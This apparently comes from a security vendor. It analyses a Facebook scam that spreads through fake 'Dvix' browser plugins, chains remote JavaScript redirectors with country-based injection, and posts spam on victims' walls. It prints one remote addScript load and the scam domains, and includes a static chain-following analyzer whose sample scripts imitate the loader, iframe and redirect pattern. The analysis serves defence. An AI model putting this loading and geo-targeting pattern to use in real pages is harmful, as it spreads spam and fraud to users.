Introduction
We have been coming across many Facebook scams. The sample analysed here, taken from one such scam, has an interesting feature: it looks up the affected victim's location and, depending on the country the victim is in, injects additional scripts. The victim is redirected through a number of other sites that use the Facebook API to post the scam on the victim's friends' pages, and additional malicious files may be downloaded to the user's machine.
Infection Vector
The user is tricked into clicking a scam post on a friend's page or in Facebook's public posts. The posts carry luring pictures and wording such as "Hey See This Now". Once the user clicks the link, he is redirected to a page that asks him to download a plugin in order to watch the video. That page checks whether the user is on Chrome or Firefox and then installs the malicious extension under the guise of the missing plugin.
A file with the *.xpi extension is a Firefox add-on, whereas a *.crx file is a Chrome extension.
Victim attacked using Chrome Browser
Fig 1: Plugin-required notification with Install button
Fig 2: After the user clicks "Install Plugin"
Fig 3: Plugin added to Chrome Browser
Victim attacked using Firefox browser
Fig 4: Scam requesting the victim to install malicious plugin
Fig 5: Plugin added to Firefox Browser
Note the misspelling "Dvix", which differs from the "DivX" used in the earlier fake YouTube DivX plugins for Google Chrome.
JavaScript redirectors working silently in the background
The continuous redirections the victim experiences are caused by a few JavaScript redirector files that run silently in the background. They are shown below.
Script.js
Script.js has a function addscript() which loads another script, "*****.info/new/extra.js", from a second site.
Extra.js
Extra.js in turn redirects to beessa.info/new and downloads three further JavaScript files (fuction.js, fuction1.js, love.js), which are the most interesting ones.
Below are the new JavaScript files that Extra.js downloads to the victim's machine during the redirections.
Extra.js also contains code to inject an iframe whose source is hard-coded as http://faceboc0k.blogspot.com/
This link is called repeatedly to spam users.
Function.js – carries the luring message that appears on the victims' walls
Function.js contains code to redirect the user to several other pages, the text of the message used on the malicious link that promises the video, and the Ajax call that posts on the user's wall.
Redirect.js
This script holds the most interesting feature: the function geoip_country_code() is used to obtain the user's location as a country code. A total of 11 countries are checked.
If the returned value is any of the 11 country codes, the following code is injected. This behaviour is similar to the SMS Trojans that come bundled with Android applications.
addScript(http://beessaal.info/new/redirect2.js);
Love.js checks whether the victim is located in Pakistan
This file loads a script from the following URL (geoip.js), which retrieves the victim's location and checks whether the victim is in Pakistan (PK). If so, another script is injected for further redirection.
Values retrieved by geoip.js
geoip.js retrieves the user's current location (country name, city, region, latitude, longitude, etc.).
Using the information gathered by geoip.js, the victim is shown a message box announcing him as the day's winner from his locality.
Inspecting the DOM reveals the message that is to be displayed in the browser before the browser exits.
The victim is redirected through several pages and finally lands on a page presenting a survey or a prize-winning notification.
Fig 6: Fake game page that appears at the end of the redirections.
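The chain of redirectors described above (Script.js loading Extra.js, which in turn loads further scripts and an iframe, with love.js and redirect.js gating one more load on the geoip_country_code() result) can be followed statically, without executing any of it. The following is an added example written for this article, not code from the scam itself: the script bodies are constructed stand-ins on reserved example domains (scam.example, spam.example, prize.example) that imitate the addScript()/iframe/geoip_country_code() pattern, and the addScript regex and URL extraction are this example's own assumptions about how such a loader is written.

```javascript
// Added example (not the scam's code): statically follow a chain of JavaScript
// redirectors of the kind described in the article, without running any of it.
// CAPTURED is a constructed corpus (URL -> script body) on reserved example
// domains; the bodies imitate the addScript()/iframe/geoip pattern only.
const CAPTURED = {
  "http://scam.example/new/script.js": `
    function addScript(src){var s=document.createElement('script');s.src=src;document.body.appendChild(s);}
    addScript('http://scam.example/new/extra.js');`,
  "http://scam.example/new/extra.js": `
    addScript("http://scam.example/new/function.js");
    addScript("http://scam.example/new/love.js");
    var f=document.createElement('iframe');f.src="http://spam.example/";document.body.appendChild(f);`,
  "http://scam.example/new/function.js": `
    addScript('http://scam.example/new/function1.js'); /* (not captured) */
    /* posts the luring message to the wall via an Ajax call */`,
  "http://scam.example/new/love.js": `
    if (geoip_country_code() == 'PK') { addScript('http://scam.example/new/redirect2.js'); }`,
  "http://scam.example/new/redirect2.js": `location.href='http://prize.example/win';`,
};

// Assumed loader shape: addScript('<url>') / addScript("<url>").
const ADDSCRIPT_RE = /addScript\(\s*['"]([^'"]+)['"]\s*\)/g;
// Any other http(s) literal: iframe sources, location redirects, beacons.
const URL_RE = /https?:\/\/[^'"\s)]+/g;
// A geo guard means the load only happens for some country codes.
const GEO_GUARD_RE = /geoip_country_code\s*\(/;

// Pull the script loads, the remaining URL literals and the geo-guard flag
// out of one script body.
function extractTargets(body) {
  const scripts = [...body.matchAll(ADDSCRIPT_RE)].map(m => m[1]);
  const others = [...body.matchAll(URL_RE)].map(m => m[0]).filter(u => !scripts.includes(u));
  return { scripts, others, geoGated: GEO_GUARD_RE.test(body) };
}

// Breadth-first walk from the first script: every addScript() target is
// followed (a static over-approximation, so geo-gated branches are included),
// scripts we have no capture of are reported rather than dropped.
function followChain(corpus, start) {
  const loaded = [], unresolved = [], geoGated = [];
  const otherUrls = new Set(), seen = new Set();
  const queue = [start];
  while (queue.length) {
    const url = queue.shift();
    if (seen.has(url)) continue;
    seen.add(url);
    const body = corpus[url];
    if (body === undefined) { unresolved.push(url); continue; }
    loaded.push(url);
    const t = extractTargets(body);
    if (t.geoGated) geoGated.push(url);
    t.scripts.forEach(s => queue.push(s));
    t.others.forEach(o => otherUrls.add(o));
  }
  const domains = new Set([...loaded, ...otherUrls].map(u => new URL(u).hostname));
  return { loaded, unresolved, otherUrls: [...otherUrls], geoGated, domains: [...domains].sort() };
}

console.log(JSON.stringify(followChain(CAPTURED, "http://scam.example/new/script.js"), null, 2));
```

Because the walk is static, it follows the geoip_country_code() branch regardless of the analyst's own country, which is exactly what a dynamic run from a non-targeted country would miss; the geoGated list records which scripts carry such a guard so that they can be re-tested with the relevant country codes. A referenced script that was never captured ends up in unresolved instead of silently vanishing from the chain, and the domains list gives the blocklist candidates in one place.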
Cleaning up the victim's browsers and Facebook wall
The victim needs to uninstall the browser extension that is spamming his Facebook contacts. In Firefox, go to Tools and select Add-ons. Select Extensions, locate the offending extension, click the Disable button and restart the browser.
In Google Chrome, click the wrench icon, click Tools and select Extensions, then locate the offending extension and remove it.
On the Facebook wall, go to the icon at the top right-hand corner of each post and select Delete Post from the drop-down menu. Facebook is informed of the post and will block it from its end.
Our Advice to Customers
Given the increasing popularity of Facebook across the globe and its number of users, malware authors keep coming up with new scams every day, and they are paid handsomely for it. Facebook, for its part, is in a continuous effort to secure its users. We advise users not to click on any link on Facebook that promises free gifts, celebrity scandal videos and the like. Do some searching about the link before clicking it, and report it as spam if you find it on your own wall or on any of your friends' walls.